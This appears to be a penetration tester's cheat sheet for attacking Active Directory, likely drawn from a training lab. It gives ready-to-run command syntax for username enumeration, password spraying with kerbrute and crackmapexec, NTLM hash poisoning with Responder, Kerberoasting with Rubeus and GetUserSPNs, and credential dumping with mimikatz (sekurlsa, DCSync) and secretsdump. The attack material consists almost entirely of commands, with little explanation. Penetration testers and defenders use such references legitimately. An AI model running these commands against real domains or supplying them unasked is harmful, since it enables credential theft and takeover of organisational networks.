Interesting Tools
Internal AD Username Enumeration
Kerbrute
Installation:
1
2
3
sudo git clone https://github.com/ropnop/kerbrute.git
sudo make all
Including it in the environment variable:
1
sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute
Syntax:
1
kerbrute userenum -d <domain> --dc <IP> <listUsernames> -o <File-valid_AD_users>
The command provided is used to perform user enumeration in an Active Directory (AD) domain using the tool “kerbrute.” Kerbrute is a popular tool used for conducting brute-force attacks and user enumeration in Active Directory environments.
ldapsearch
Gathering Users with LDAP Anonymous.
Syntax:
1
ldapsearch -h <IP> -x -b "DC=<domain>" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
Example command:
1
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
windapsearch
1
./windapsearch.py --dc-ip <IP> -u "" -U
Here we can specify anonymous access by providing a blank username with the -u flag and the -U flag to tell the tool to retrieve just users.
Crackmapexec
Syntax:
1
crackmapexec <protocol> <IP> -u <username> -p <password> --users
PowerView
This command creating a list of Domain Users:
1
PS C:\> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > <ad_users.txt>
Gathering Information
PowerView
PowerView is a versatile PowerShell script for Active Directory reconnaissance and enumeration in Windows environments.
It is a valuable tool for gathering information about domains, users, groups, and permissions. It facilitates the identification of vulnerable user accounts, high-privileged groups, and other key aspects of Active Directory’s structure and configuration.
Download: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Password Spraying
kerbrute
Syntax:
1
kerbrute passwordspray -d <domain> --dc <IP> <list_users.txt> <password>
Crackmapexec
Syntax:
1
crackmapexec <protocol> <IP> -u <lits_users.txt> -p <password> | grep +
Validating the Credentials:
1
crackmapexec <protocol> <IP> -u <username> -p <password>
DomainPasswordSpray.ps1
It is a tool from Windows.
Syntax:
1
2
PS C:\> Import-Module .\DomainPasswordSpray.ps1
PS C:\> Invoke-DomainPasswordSpray -Password <password> -OutFile <outputFile> -ErrorAction SilentlyContinue
Download: https://github.com/dafthack/DomainPasswordSpray
Acquire Credentials or other Sensitive Data
Obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.
1
Snaffler.exe -s -d <domain> -o <output.log> -s -v data
Graphic Interface for analyze Active Directory (AD)
BloodHound
It leverages data from AD, including user accounts, group memberships, permissions, and trust relationships, to map the network’s path and permissions.
SharpHound is a component of the BloodHound project. It is a collection of C# tools designed to gather data from an Active Directory (AD) environment quickly and efficiently. SharpHound leverages various AD enumeration techniques to retrieve information about users, groups, permissions, and other AD objects. The data collected by SharpHound is used by BloodHound to analyze and visualize the AD environment, identifying attack paths and potential security risks.
Download: https://github.com/BloodHoundAD/BloodHound
Running the SharpHound.exe collector:
1
.\SharpHound.exe -c All --zipfilename <output>
Intercepting Hashes
Responder
In this process, the malicious file will be used to trigger the server. Responder tool will be employed as the poisoner responsible for carrying out the NTLMv2 Relay and capturing the hashes.
Download: https://github.com/lgandx/Responder
Syntax:
1
./Responder.py -I <WiFi-interface> [options]
Inveigh
Download: https://github.com/Kevin-Robertson/Inveigh
Windows Kerberos Ticket
Rubeus
Rubeus is a powerful open-source tool used for Windows Kerberos ticket manipulation. It is primarily designed for offensive security purposes and is widely utilized by security professionals, penetration testers, and red teamers.
Some key functionalities of Rubeus include: Ticket Extraction, Pass-the-Ticket (PTT), Kerberoasting, Overpass-the-Hash and more.
- Kerberoasting: Rubeus can request and crack Kerberos Ticket Granting Service (TGS) tickets for service accounts to obtain plaintext passwords.
Download: https://github.com/GhostPack/Rubeus
Mimikatz
Performs many functions. Notably, pass-the-hash attacks, extracting plaintext passwords, and Kerberos ticket extraction from memory on a host.
Download: https://github.com/ParrotSec/mimikatz
Command:
1
mimikatz # sekurlsa::tickets /export
Credentialed Enumeration - from Windows
ActiveDirectory Module
Load ActiveDirectory Module
1
2
PS C:\> Import-Module ActiveDirectory
PS C:\> Get-Module
Get Domain Info
1
PS C:\> Get-ADDomain
Checking For Trust Relationships
1
PS C:\> Get-ADTrust -Filter *
Group Enumeration
1
PS C:\> Get-ADGroup -Filter * | select name
Detailed Group Info
1
PS C:\> Get-ADGroup -Identity "<nameGroup>"
PowerView Module
Domain User Information
1
PS C:\> Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
Recursive Group Membership
1
PS C:\> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Trust Enumeration
1
PS C:\> Get-DomainTrustMapping
Testing for Local Admin Access
1
PS C:\> Test-AdminAccess -ComputerName <computerName>
Finding Users With SPN Set
We can check for users with the SPN attribute set, which indicates that the account may be subjected to a Kerberoasting attack.
1
PS C:\> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
Net Commands
Listing Domain Groups
1
PS C:\> net group /domain
Information about a Domain User
1
PS C:\> net user /domain <username>
Kerberoasting
Kerberoasting is a lateral movement/privilege escalation technique in Active Directory environments. This attack targets Service Principal Names (SPN) accounts. SPNs are unique identifiers that Kerberos uses to map a service instance to a service account in whose context the service is running.
Interesting Tools from Linux
GetUserSPNs.py
It is a tool for listing SPN Accounts. The TGS tickets will be output with -request flag and it can be cracked later.
1
GetUserSPNs.py -dc-ip <IP> <domain>/<username> -request
Download: https://github.com/fortra/impacket
secretsdump
It is a tool for extracting NTLM Hashes and Kerberos Keys.
Syntax:
1
secretsdump.py -outputfile <output> -just-dc <domain>/<username>@<IP>
Interesting Tools from Windows
setspn
1
C:\> setspn.exe -Q */*
Mimikatz
It is very interesting for extracting Tickets from Memory.
1
mimikatz # kerberos::list /export
PowerView
1
2
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname
It is used to Extract TGS Tickets.
Rubeus
1
PS C:\> .\Rubeus.exe kerberoast /user:<username> /nowrap
Download: https://github.com/GhostPack/Rubeus
ACL Enumeration
Interesting Tools
PowerView
1
PS C:\> Find-InterestingDomainAcl
Other way:
1
2
3
PS C:\> Import-Module .\PowerView.ps1
PS C:\> $sid = Convert-NameToSid <username>
PS C:\> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Other way:
1
2
PS C:\> $sid2 = Convert-NameToSid <username>
PS C:\> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose
BloodHound
DCSync
Interesting Tools
Mimikatz
Syntax:
1
mimikatz # lsadump::dcsync /domain:<domain> /user:<username>
Enumerating GPO Names
Powershell
1
PS C:\> Get-DomainGPO -All |select displayname